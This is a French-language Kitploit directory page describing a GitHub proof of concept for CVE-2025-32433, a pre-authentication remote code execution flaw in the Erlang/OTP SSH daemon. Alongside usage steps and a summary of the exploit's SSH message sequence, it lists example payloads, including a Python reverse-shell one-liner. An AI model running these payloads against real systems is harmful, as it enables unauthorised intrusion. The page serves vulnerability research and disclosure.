Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-32433 — Preuve de concept pour CVE-2025-32433, une RCE pré-authentification dans le démon SSH Erlang/OTP. Comprend un script Python pour envoyer des requêtes de canal SSH conçues et exécuter des commandes arbitraires. | Kitploit
Outils/GitHubGitHub/mdusmandasthaheer/cve-2025-32433
Analyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubmdusmandasthaheer/cve-2025-32433

CVE-2025-32433

Preuve de concept pour CVE-2025-32433, une RCE pré-authentification dans le démon SSH Erlang/OTP. Comprend un script Python pour envoyer des requêtes de canal SSH conçues et exécuter des commandes arbitraires.

Voir le dépôt
3il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-32433 – Vulnérabilité RCE dans Erlang/OTP SSH

📌 Résumé

CVE-2025-32433 est une vulnérabilité d'exécution de code à distance (RCE) affectant le démon SSH d'Erlang/OTP. La cause racine est une gestion incorrecte des requêtes de canal SSH pré-authentification qui peuvent être façonnées par un attaquant pour provoquer l'exécution de commandes arbitraires avant l'authentification. Le PoC inclus démontre l'envoi de tels paquets SSH modifiés ; par défaut, il écrit /lab.txt sur la cible mais peut être adapté pour d'autres commandes.

⚠️ Avertissement : Ce dépôt est à des fins éducatives et de recherche uniquement. Ne pas utiliser contre des systèmes sans autorisation explicite.

🛠️ Utilisation

  1. Modifiez les détails de la cible dans le script PoC :
HOST = "127.0.0.1"  # Target IP
PORT = 2222         # Target SSH port
  1. Exécutez l'exploit :
python3 cve-2025-32433.py

Par défaut, il crée /lab.txt contenant pwned. Modifiez la charge utile dans build_channel_request pour exécuter vos propres commandes.

🧩 Exemples de payloads

# Write a file
file:write_file("/lab.txt", <<"pwned">>).

Spawn a reverse shell

os:cmd("python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("127.0.0.1",2222)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); import pty; pty.spawn("sh")'")

🔧 Comment fonctionne le PoC (résumé)

  • Se connecte au service SSH et échange les bannières.
  • Envoie un SSH_MSG_KEXINIT modifié pour ressembler à une poignée de main normale.
  • Envoie SSH_MSG_CHANNEL_OPEN et SSH_MSG_CHANNEL_REQUEST avec une charge utile exec avant l'authentification.
  • Si vulnérable, le serveur exécute la commande Erlang fournie.

🙏 Crédits

Découverte et rédaction par Matt Keeley (Platform Security). Merci à lui d'avoir publié le PoC et partagé les détails.

Lien du blog : https://platformsecurity.com/blog/CVE-2025-32433-poc

📚 Références

  • Blog de Matt Keeley
  • Avis de sécurité Erlang/OTP
  • Enregistrement CVE de MITRE
Télécharger l’outil